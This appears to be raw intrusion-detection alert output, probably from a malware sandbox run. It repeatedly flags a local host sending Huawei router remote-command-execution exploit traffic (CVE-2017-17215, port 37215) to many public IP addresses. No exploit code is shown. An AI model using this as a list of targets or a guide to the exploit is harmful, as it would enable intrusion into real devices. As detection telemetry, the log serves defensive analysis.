                                                    07/10/24-08:27:07.292595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753837215192.168.2.14157.113.66.67
                                                    07/10/24-08:27:19.184507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397037215192.168.2.1457.141.36.225
                                                    07/10/24-08:27:08.402603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607437215192.168.2.14157.252.99.203
                                                    07/10/24-08:27:24.944051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950237215192.168.2.14157.246.86.3
                                                    07/10/24-08:27:28.130365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211237215192.168.2.14197.123.172.236
                                                    07/10/24-08:27:28.046169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700637215192.168.2.14118.73.226.61
                                                    07/10/24-08:26:22.287324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976237215192.168.2.14157.4.150.118
                                                    07/10/24-08:27:05.172720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746237215192.168.2.14129.243.244.205
                                                    07/10/24-08:26:22.223907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607437215192.168.2.14157.225.211.146
                                                    07/10/24-08:27:13.753461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669837215192.168.2.1441.185.195.152
                                                    07/10/24-08:27:34.126815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635037215192.168.2.148.232.43.43
                                                    07/10/24-08:27:33.956245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286637215192.168.2.1441.129.176.40
                                                    07/10/24-08:26:33.151266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806037215192.168.2.14185.246.128.69
                                                    07/10/24-08:27:02.868387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002837215192.168.2.1431.10.41.171
                                                    07/10/24-08:26:26.532653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045037215192.168.2.14157.225.242.118
                                                    07/10/24-08:26:26.592095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949637215192.168.2.1441.245.119.238
                                                    07/10/24-08:27:13.905585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991437215192.168.2.14157.194.235.223
                                                    07/10/24-08:26:15.875738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130637215192.168.2.1465.100.54.89
                                                    07/10/24-08:27:30.556731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647237215192.168.2.14196.120.92.145
                                                    07/10/24-08:27:10.574442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741837215192.168.2.1441.162.211.220
                                                    07/10/24-08:27:17.084345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087237215192.168.2.14157.246.252.97
                                                    07/10/24-08:26:25.488063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774637215192.168.2.14197.62.96.68
                                                    07/10/24-08:26:31.090625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481037215192.168.2.14157.26.102.221
                                                    07/10/24-08:26:53.202392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205837215192.168.2.1441.48.40.139
                                                    07/10/24-08:27:10.712804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857237215192.168.2.14157.23.246.83
                                                    07/10/24-08:26:59.584136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563237215192.168.2.14197.51.28.110
                                                    07/10/24-08:26:26.527287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275037215192.168.2.14157.197.205.157
                                                    07/10/24-08:27:27.065687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430837215192.168.2.14157.66.221.64
                                                    07/10/24-08:26:22.218292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816237215192.168.2.1457.149.104.202
                                                    07/10/24-08:26:52.022407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804437215192.168.2.1461.126.62.179
                                                    07/10/24-08:26:38.568702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925637215192.168.2.1441.245.38.90
                                                    07/10/24-08:26:28.862875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768237215192.168.2.1441.63.227.2
                                                    07/10/24-08:26:55.386841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3634437215192.168.2.14157.57.141.136
                                                    07/10/24-08:27:23.937541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080037215192.168.2.148.107.19.88
                                                    07/10/24-08:26:53.187114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961637215192.168.2.14157.144.225.210
                                                    07/10/24-08:27:17.107350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3509837215192.168.2.1441.62.145.250
                                                    07/10/24-08:27:33.946859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403437215192.168.2.14197.16.47.77
                                                    07/10/24-08:27:11.537830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324237215192.168.2.1431.189.35.217
                                                    07/10/24-08:26:31.042472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472237215192.168.2.14161.79.87.86
                                                    07/10/24-08:27:22.835988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020437215192.168.2.14197.113.10.240
                                                    07/10/24-08:26:59.831148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802037215192.168.2.14157.159.201.81
                                                    07/10/24-08:26:42.433538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687037215192.168.2.14157.11.104.140
                                                    07/10/24-08:26:41.528829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869437215192.168.2.14101.196.183.217
                                                    07/10/24-08:26:42.410235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518837215192.168.2.14197.22.17.94
                                                    07/10/24-08:26:28.754547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416637215192.168.2.14197.37.172.51
                                                    07/10/24-08:26:52.066193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3425237215192.168.2.14197.102.240.32
                                                    07/10/24-08:26:38.552864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865037215192.168.2.14197.67.117.194
                                                    07/10/24-08:26:41.382366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152037215192.168.2.1485.236.146.92
                                                    07/10/24-08:27:10.668166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392837215192.168.2.1441.151.63.84
                                                    07/10/24-08:27:19.329520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202637215192.168.2.14195.182.144.206
                                                    07/10/24-08:26:42.438792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287037215192.168.2.14197.160.44.124
                                                    07/10/24-08:26:11.452655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390237215192.168.2.14221.191.119.202
                                                    07/10/24-08:27:02.833668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699837215192.168.2.14189.12.231.86
                                                    07/10/24-08:26:20.179402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731437215192.168.2.1481.227.235.41
                                                    07/10/24-08:27:24.956941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958037215192.168.2.1441.169.76.150
                                                    07/10/24-08:27:32.590326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021037215192.168.2.1441.234.60.199
                                                    07/10/24-08:26:18.000984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999637215192.168.2.14194.75.180.102
                                                    07/10/24-08:27:28.149235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024437215192.168.2.1441.61.102.235
                                                    07/10/24-08:26:14.743404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626637215192.168.2.14197.184.181.226
                                                    07/10/24-08:26:41.401211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3444237215192.168.2.1441.208.146.223
                                                    07/10/24-08:26:28.855166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639237215192.168.2.14197.198.155.35
                                                    07/10/24-08:26:55.385980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388637215192.168.2.1441.155.97.110
                                                    07/10/24-08:26:29.855669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324837215192.168.2.14157.167.166.224
                                                    07/10/24-08:26:49.809018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733837215192.168.2.14157.214.99.223
                                                    07/10/24-08:27:23.822671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5562237215192.168.2.1441.29.196.84
                                                    07/10/24-08:26:25.509517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5906237215192.168.2.14135.83.52.211
                                                    07/10/24-08:27:22.460068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821437215192.168.2.14157.54.96.161
                                                    07/10/24-08:27:33.726260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307237215192.168.2.14178.51.14.88
                                                    07/10/24-08:27:19.310964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754637215192.168.2.14197.91.201.228
                                                    07/10/24-08:27:32.545025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255037215192.168.2.1441.127.237.182
                                                    07/10/24-08:26:15.840826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703237215192.168.2.14197.174.194.120
                                                    07/10/24-08:27:33.771362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994037215192.168.2.1441.90.183.251
                                                    07/10/24-08:27:22.445688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222237215192.168.2.1441.86.204.217
                                                    07/10/24-08:27:30.406013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038037215192.168.2.14157.178.46.16
                                                    07/10/24-08:26:29.743461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826437215192.168.2.14157.125.98.222
                                                    07/10/24-08:27:10.601201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950837215192.168.2.14157.230.21.82
                                                    07/10/24-08:26:14.819021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087837215192.168.2.14197.236.188.222
                                                    07/10/24-08:27:14.834024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659237215192.168.2.14157.191.196.227
                                                    07/10/24-08:27:31.538711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664437215192.168.2.1441.9.175.249
                                                    07/10/24-08:26:48.013937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401437215192.168.2.14146.39.121.168
                                                    07/10/24-08:26:20.128612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733437215192.168.2.1441.253.212.41
                                                    07/10/24-08:26:22.273376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644637215192.168.2.1441.91.155.177
                                                    07/10/24-08:27:33.895766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292837215192.168.2.1441.111.25.14
                                                    07/10/24-08:26:15.859718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093437215192.168.2.14197.215.63.81
                                                    07/10/24-08:26:36.367813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802037215192.168.2.14197.198.81.87
                                                    07/10/24-08:26:51.964382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5062837215192.168.2.14151.7.40.199
                                                    07/10/24-08:27:23.952903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807437215192.168.2.14191.124.102.208
                                                    07/10/24-08:26:17.951496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672037215192.168.2.14202.58.141.127
                                                    07/10/24-08:27:07.263619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126637215192.168.2.14197.224.156.241
                                                    07/10/24-08:26:43.670311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713037215192.168.2.1459.162.92.51
                                                    07/10/24-08:26:17.950473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101037215192.168.2.14176.57.185.23
                                                    07/10/24-08:26:49.828645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094037215192.168.2.1441.177.13.246
                                                    07/10/24-08:26:55.268885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478637215192.168.2.14197.166.90.145
                                                    07/10/24-08:27:33.907935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587637215192.168.2.14197.133.251.215
                                                    07/10/24-08:27:27.047210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748437215192.168.2.1441.134.122.188
                                                    07/10/24-08:27:14.867068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183837215192.168.2.14197.87.144.61
                                                    07/10/24-08:27:20.487738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510237215192.168.2.14157.136.104.175
                                                    07/10/24-08:27:32.595538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946037215192.168.2.14197.97.130.150
                                                    07/10/24-08:27:02.791208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482837215192.168.2.1441.90.241.84
                                                    07/10/24-08:26:28.917896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713837215192.168.2.1441.255.41.101
                                                    07/10/24-08:26:36.399838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152237215192.168.2.1441.54.118.118
                                                    07/10/24-08:26:41.329184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4161437215192.168.2.14197.128.20.88
                                                    07/10/24-08:26:59.800330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085037215192.168.2.14197.210.6.192
                                                    07/10/24-08:27:08.349931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526837215192.168.2.14157.44.91.188
                                                    07/10/24-08:26:26.616728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411837215192.168.2.1441.136.170.166
                                                    07/10/24-08:26:14.804179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470637215192.168.2.14193.81.110.172
                                                    07/10/24-08:26:59.634002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775037215192.168.2.1441.22.62.178
                                                    07/10/24-08:26:23.304428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097237215192.168.2.14197.135.3.202
                                                    07/10/24-08:26:25.481164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773037215192.168.2.14197.248.233.65
                                                    07/10/24-08:26:41.281691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760437215192.168.2.14197.149.222.180
                                                    07/10/24-08:27:02.876931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679437215192.168.2.14197.129.185.99
                                                    07/10/24-08:27:13.835787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5432037215192.168.2.14153.34.35.48
                                                    07/10/24-08:27:07.376641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693837215192.168.2.14197.228.20.190
                                                    07/10/24-08:27:33.945203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422037215192.168.2.14157.232.7.227
                                                    07/10/24-08:27:22.849786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969237215192.168.2.14197.191.95.66
                                                    07/10/24-08:27:24.863618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237037215192.168.2.14172.97.81.80
                                                    07/10/24-08:26:59.667418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810237215192.168.2.14134.94.200.160
                                                    07/10/24-08:27:02.968818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209237215192.168.2.14135.187.76.71
                                                    07/10/24-08:26:13.778928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5178037215192.168.2.1441.11.106.64
                                                    07/10/24-08:26:47.895563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897637215192.168.2.14157.188.167.127
                                                    07/10/24-08:26:23.293850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079237215192.168.2.1441.79.125.13
                                                    07/10/24-08:27:24.962924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4497237215192.168.2.14197.167.71.34
                                                    07/10/24-08:26:18.001692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202237215192.168.2.14157.154.12.49
                                                    07/10/24-08:27:07.272369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794637215192.168.2.14105.24.7.84
                                                    07/10/24-08:27:08.415966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673437215192.168.2.14197.62.63.118
                                                    07/10/24-08:27:20.492673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3614237215192.168.2.14175.72.48.248
                                                    07/10/24-08:26:52.081340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598837215192.168.2.14197.167.205.145
                                                    07/10/24-08:26:28.739643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000637215192.168.2.1441.46.100.167
                                                    07/10/24-08:27:02.972894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346237215192.168.2.1441.149.238.162
                                                    07/10/24-08:26:36.330025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571837215192.168.2.14197.20.107.40
                                                    07/10/24-08:27:22.810148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535437215192.168.2.14182.9.18.64
                                                    07/10/24-08:26:11.176119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084237215192.168.2.14157.16.184.209
                                                    07/10/24-08:27:23.971653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182237215192.168.2.14197.125.61.32
                                                    07/10/24-08:26:18.025599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275437215192.168.2.1441.104.43.88
                                                    07/10/24-08:26:23.305331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5708237215192.168.2.14197.185.119.7
                                                    07/10/24-08:27:19.290152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021837215192.168.2.1441.111.162.34
                                                    07/10/24-08:26:22.224405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740837215192.168.2.14157.18.47.189
                                                    07/10/24-08:26:55.442077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287437215192.168.2.14197.225.187.177
                                                    07/10/24-08:27:33.873647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610637215192.168.2.14157.78.138.25
                                                    07/10/24-08:27:14.865429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783637215192.168.2.14186.88.66.20
                                                    07/10/24-08:27:14.885160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806637215192.168.2.1441.166.124.101
                                                    07/10/24-08:26:22.278406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877637215192.168.2.14157.43.136.101
                                                    07/10/24-08:26:47.953099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147237215192.168.2.14157.143.175.6
                                                    07/10/24-08:26:36.415426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130837215192.168.2.14197.4.254.3
                                                    07/10/24-08:26:59.528584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375837215192.168.2.14197.53.29.158
                                                    07/10/24-08:26:59.816598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4456037215192.168.2.1413.24.179.75
                                                    07/10/24-08:27:02.860039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474837215192.168.2.14157.28.41.23
                                                    07/10/24-08:27:10.558738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852437215192.168.2.14197.111.104.7
                                                    07/10/24-08:27:14.875221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662037215192.168.2.1449.161.210.149
                                                    07/10/24-08:27:33.857818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639037215192.168.2.14208.153.244.70
                                                    07/10/24-08:27:17.088897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842837215192.168.2.14157.20.245.180
                                                    07/10/24-08:26:38.652813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361837215192.168.2.1441.172.192.93
                                                    07/10/24-08:26:23.290002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972237215192.168.2.14197.179.84.156
                                                    07/10/24-08:26:51.957475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432437215192.168.2.14157.14.248.212
                                                    07/10/24-08:27:02.838823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216637215192.168.2.14197.30.164.67
                                                    07/10/24-08:26:29.773841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706037215192.168.2.1441.232.119.222
                                                    07/10/24-08:26:11.547112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751237215192.168.2.14197.5.82.148
                                                    07/10/24-08:26:11.661764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359037215192.168.2.1441.170.52.142
                                                    07/10/24-08:27:07.393552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304237215192.168.2.14191.138.193.151
                                                    07/10/24-08:26:25.525014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827637215192.168.2.1469.239.92.79
                                                    07/10/24-08:26:11.592192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469837215192.168.2.14157.171.1.11
                                                    07/10/24-08:26:43.911091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934437215192.168.2.14157.86.142.188
                                                    07/10/24-08:26:49.819552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3556437215192.168.2.1441.13.110.67
                                                    07/10/24-08:26:15.872780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917637215192.168.2.14118.177.188.244
                                                    07/10/24-08:26:47.967087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784437215192.168.2.14121.183.221.79
                                                    07/10/24-08:27:32.545820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341237215192.168.2.1441.189.22.41
                                                    07/10/24-08:26:23.345555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849837215192.168.2.14197.20.109.193
                                                    07/10/24-08:26:15.813781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479437215192.168.2.14197.4.25.173
                                                    07/10/24-08:27:32.540139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873837215192.168.2.14197.144.26.84
                                                    07/10/24-08:27:08.318439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048437215192.168.2.14197.100.144.36
                                                    07/10/24-08:27:24.901081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983237215192.168.2.1441.207.234.105
                                                    07/10/24-08:27:07.369832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787837215192.168.2.14197.86.112.91
                                                    07/10/24-08:26:25.449750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843837215192.168.2.14197.251.28.223
                                                    07/10/24-08:26:28.750932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882437215192.168.2.14157.34.167.232
                                                    07/10/24-08:27:08.364400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073037215192.168.2.14157.204.179.137
                                                    07/10/24-08:26:45.583882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033237215192.168.2.14197.164.147.180
                                                    07/10/24-08:26:25.430208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309237215192.168.2.14157.63.114.196
                                                    07/10/24-08:26:36.442425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991237215192.168.2.14157.43.124.165
                                                    07/10/24-08:26:31.105929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285637215192.168.2.14197.89.230.237
                                                    07/10/24-08:26:49.819720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883837215192.168.2.14197.213.78.112
                                                    07/10/24-08:26:41.595254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456237215192.168.2.14157.80.49.160
                                                    07/10/24-08:26:57.631104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084237215192.168.2.14157.64.95.117
                                                    07/10/24-08:26:25.496138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432637215192.168.2.14197.11.230.178
                                                    07/10/24-08:27:10.672315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715237215192.168.2.1425.23.166.240
                                                    07/10/24-08:26:20.110888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693237215192.168.2.14157.216.110.19
                                                    07/10/24-08:27:19.294110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554037215192.168.2.14157.63.153.63
